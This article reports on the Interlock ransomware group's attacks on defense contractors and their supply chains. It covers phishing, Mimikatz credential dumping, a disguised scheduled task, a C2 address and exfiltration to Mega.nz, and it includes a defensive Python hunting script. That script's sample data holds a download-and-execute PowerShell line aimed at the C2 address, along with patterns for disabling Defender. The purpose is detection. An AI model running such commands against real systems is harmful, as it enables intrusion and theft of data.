The Interlock ransomware group has escalated its cyberattacks, now focusing on defense contractors and their supply chains, posing significant threats to military logistics, intellectual property, and national security. First identified in September 2024, Interlock employs big-game hunting tactics against high-value organizations and double extortion, stealing data before encrypting systems so that a victim faces both an outage and a leak threat.
Recent Incidents and Targets
Notable victims include AMTEC, a U.S.-based manufacturer of lethal ammunition for military and law enforcement, and its parent company, National Defense Corporation (NDC). Analysts from Resecurity have confirmed that Interlock’s data leak site, Worldwide Secrets Blog, now hosts classified documents referencing contracts with the U.S. Department of Defense (DoD), Raytheon, and Thales, among others.
Interlock’s shift toward defense sector targets aligns with current geopolitical tensions. The group exploits global conflicts as cover for espionage, often exfiltrating shipment schedules, warehouse locations, and engineering blueprints. For instance, leaked logistics data included a 2018 DoD contract for M739A1 fuzes bound for Yuma Proving Ground, detailing transportation codes and personnel contacts. Such breaches enable adversaries to disrupt supply chains or redirect shipments during transit.
Technical Sophistication and Attack Methods
Interlock’s technical sophistication lies in its hybrid approach. While the group has recently avoided deploying encryption binaries in some intrusions, opting instead for pure data theft, it relies on Living-off-the-Land (LotL) techniques to evade detection: legitimate, signed Windows tooling such as PowerShell and Windows Management Instrumentation (WMI) executes the malicious logic, so there is no dropped binary for antivirus to flag.
The group’s initial access typically stems from phishing campaigns impersonating logistics partners or from compromised third-party vendors. Once inside, attackers deploy custom PowerShell scripts to disable security tools; a script recovered from an infected AMTEC subsidiary terminated Windows Defender processes. Tampering of this kind leaves a trail in PowerShell script block logs and the Defender operational log, but only if those logs are forwarded off the host before the attacker gains the privileges needed to clear them.
Resecurity’s analysis revealed that Interlock actors then use Mimikatz to dump credentials from lsass.exe, enabling lateral movement. A scheduled task named WindowsUpdateSync is created to maintain persistence, executing a Base64-encoded payload that connects to Interlock’s command-and-control (C2) server at `212.237.217[.]182`. The task name is chosen to blend in with legitimate Windows update tasks; the reliable tell is the task’s action (powershell.exe launched with an encoded command) rather than its name, so hunts should inspect task actions and authors, not just task names.
The group also exploits unpatched vulnerabilities in enterprise VPNs and Microsoft Exchange servers. In one case, attackers reportedly weaponized CVE-2024-21407 to gain SYSTEM privileges; note that Microsoft’s advisory lists this identifier as a Windows Hyper-V remote code execution vulnerability rather than a Windows kernel privilege escalation, so defenders should verify the identifier against the advisory before using it for patch prioritisation. Post-exploitation, data exfiltration occurs over TLS-encrypted channels to cloud storage platforms like Mega.nz, where it blends into ordinary HTTPS traffic; without egress allow-listing or TLS inspection, content-based network monitoring sees nothing but the destination.
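The TTP chain above (Defender tampering via PowerShell, LSASS credential dumping, the WindowsUpdateSync scheduled task with an encoded payload, beaconing to 212.237.217[.]182, exfiltration to Mega.nz) maps onto a handful of Windows event sources: Security 4688/4698 and Sysmon 1/3/10. The following Python is an added example written for this article, not code from Resecurity, the affected companies or the Interlock actors. It runs simple hunt logic over a constructed set of Security and Sysmon event records; the records, host names, the base64 payload text and the g.api.mega.co.nz hostname are made up for illustration, and only the task name and the C2 address are taken from the article.

```python
"""Hunt Windows Security/Sysmon events for the Interlock TTPs described above.

Added example for this article; not Resecurity's or the actors' code.
Only the task name and C2 address below come from the article. Everything
else (event records, host names, payload text, hostnames) is constructed.
"""
import base64
import re

C2_IP = "212.237.217.182"                   # article indicator, refanged
SUSPICIOUS_TASKS = {"windowsupdatesync"}     # article: persistence task name
EXFIL_DOMAINS = ("mega.nz", "mega.co.nz")   # mega.nz from the article; mega.co.nz assumed API domain

# PowerShell idioms that neuter Defender (general knowledge, not quoted from the article)
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s+-Disable\w+|Stop-Process[^;|]*MsMpEng|sc(?:\.exe)?\s+stop\s+WinDefend",
    re.IGNORECASE)
# Sysmon 10 GrantedAccess values typical of LSASS reads; 0x1010 = VM_READ|QUERY_LIMITED_INFO
LSASS_MASKS = {0x1010, 0x1410, 0x1438, 0x143A, 0x1FFFFF}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_event(ev):
    """Return the detection labels one event triggers (possibly none)."""
    hits = []
    src, eid = ev.get("source"), ev.get("event_id")
    if src == "Security" and eid == 4698:                      # scheduled task created
        if ev.get("task_name", "").strip("\\").lower() in SUSPICIOUS_TASKS:
            hits.append("persistence: scheduled task named like Windows Update")
    if eid in (4688, 1) and ev.get("command_line"):            # process creation (Security/Sysmon)
        cmd = ev["command_line"]
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("execution: base64 -EncodedCommand PowerShell")
        text = cmd + (" " + decoded if decoded else "")        # scan the decoded script too
        if DEFENDER_TAMPER.search(text):
            hits.append("defense evasion: Defender tampering")
        if C2_IP in text:
            hits.append("c2: known Interlock address in command line")
    if src == "Sysmon" and eid == 10:                          # process access
        target = ev.get("target_image", "").lower()
        if target.endswith("\\lsass.exe") and int(ev.get("granted_access", "0"), 16) in LSASS_MASKS:
            hits.append("credential access: LSASS memory read")
    if src == "Sysmon" and eid == 3:                           # network connection
        if ev.get("dest_ip") == C2_IP:
            hits.append("c2: connection to known Interlock address")
        host = ev.get("dest_hostname", "").lower()
        if any(host == d or host.endswith("." + d) for d in EXFIL_DOMAINS):
            hits.append("exfiltration: consumer cloud storage over TLS")
    return hits


def hunt(events):
    """Group unique detections per host; hosts with no hits are omitted."""
    findings = {}
    for ev in events:
        for hit in inspect_event(ev):
            findings.setdefault(ev["host"], set()).add(hit)
    return {h: sorted(v) for h, v in findings.items()}


# Constructed payload: what a hypothetical WindowsUpdateSync task action might run.
PAYLOAD_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://212.237.217.182/a')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD_TEXT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed, not captured telemetry
    {"host": "WS-ENG-07", "source": "Security", "event_id": 4688,
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"host": "WS-ENG-07", "source": "Security", "event_id": 4688,
     "command_line": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true; "
                     "Stop-Process -Name MsMpEng -Force"},
    {"host": "WS-ENG-07", "source": "Sysmon", "event_id": 10, "source_image": "C:\\Users\\Public\\m.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe", "granted_access": "0x1010"},
    {"host": "WS-ENG-07", "source": "Security", "event_id": 4698, "task_name": "\\WindowsUpdateSync"},
    {"host": "WS-ENG-07", "source": "Sysmon", "event_id": 3, "dest_ip": "212.237.217.182", "dest_port": 443},
    {"host": "FS-01", "source": "Sysmon", "event_id": 3, "dest_ip": "203.0.113.25",
     "dest_hostname": "g.api.mega.co.nz", "dest_port": 443},
    {"host": "WS-HR-02", "source": "Security", "event_id": 4698,
     "task_name": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Scan"},    # benign
    {"host": "WS-HR-02", "source": "Security", "event_id": 4688,
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},          # benign
]

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(host)
        for h in hits:
            print("  -", h)
```

Run stand-alone, the script reports six distinct detections on WS-ENG-07 and one on FS-01 and stays silent on WS-HR-02, whose genuine UpdateOrchestrator task and plain script invocation do not match. Two design points carry over to real telemetry: the encoded command is decoded and scanned as well as flagged, because the C2 address and Defender tampering usually sit inside the payload rather than on the visible command line, and the exfiltration check keys on destination rather than content, since the TLS session itself is opaque to the sensor.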
Implications for National Security
Interlock’s focus on defense contractors underscores the vulnerability of global military supply chains. Leaked shipment records, such as those referencing Turkmenistan’s Ministry of Defense, risk altering geopolitical power dynamics. The U.S. Department of Defense and its contractors must bolster cybersecurity measures to mitigate these threats.
Recommendations for Defense Contractors
To defend against Interlock ransomware attacks, defense contractors should:
– Enhance Phishing Awareness: Train staff to recognize and report lures, with emphasis on messages that impersonate logistics partners or arrive through supplier accounts, since that is the group’s documented initial-access path.
– Implement Multi-Factor Authentication (MFA): Require phishing-resistant MFA (FIDO2 or certificate-based) on VPN, email and remote access, so that a phished password or a credential dumped from LSASS is not sufficient on its own.
– Regularly Update Systems: Prioritise internet-facing VPN appliances and Exchange servers, the entry points named above, and verify patch status on the actual hosts rather than relying on deployment schedules.
– Monitor Network Activity: Alert on scheduled task creation outside change windows, PowerShell launched with encoded commands, non-security processes reading LSASS memory, and egress to consumer file-sharing services such as Mega.nz; block the published C2 address at the perimeter and forward endpoint logs off-host so that tampering cannot erase them.
– Develop Incident Response Plans: Rehearse a data-theft scenario as well as an encryption scenario, since Interlock’s recent intrusions have involved extortion without encryption, and decide in advance who monitors the leak site and who handles customer and contractual reporting obligations.
By adopting these measures, defense contractors can enhance their resilience against sophisticated cyber threats like Interlock.